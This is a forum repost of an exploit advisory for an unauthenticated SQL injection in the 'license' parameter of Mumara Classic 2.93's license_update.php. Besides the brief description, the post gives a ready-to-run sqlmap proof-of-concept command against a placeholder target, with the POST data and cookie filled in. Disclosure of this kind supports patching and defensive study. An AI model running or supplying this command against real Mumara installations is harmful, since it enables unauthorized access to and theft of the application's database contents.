Jump to content

Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)

This CHT

By This CHT,
in CHT Vulnerability database

Recommended Posts

This CHT Grand Master

This CHT

Posted
  • Group:  The leader of the
  • Content Count:  4,798
  • Achievement Points:  31,702
  • With Us For:  243 Days
  • Status:  Offline
  • Last Seen:  
  • Device:  Windows
Posted 
# Exploit Title: Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)
# Date: 2021-11-11
# Exploit Author: (v0yager) Shain Lakin
# Vendor Homepage: https://mumara.com
# Version: <= 2.93
# Tested on: CentOS 7

-==== Vulnerability ====-

An SQL injection vulnerability in license_update.php in Mumara Classic
through 2.93 allows a remote unauthenticated attacker to execute
arbitrary SQL commands via the license parameter.

-==== POC ====-

Using SQLMap:

sqlmap -u https://target/license_update.php --method POST --data "license=MUMARA-Delux-01x84ndsa40&install=install" -p license --cookie="PHPSESSID=any32gbaer3jaeif108fjci9x" --dbms=mysql
Link to comment
Share on other sites
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...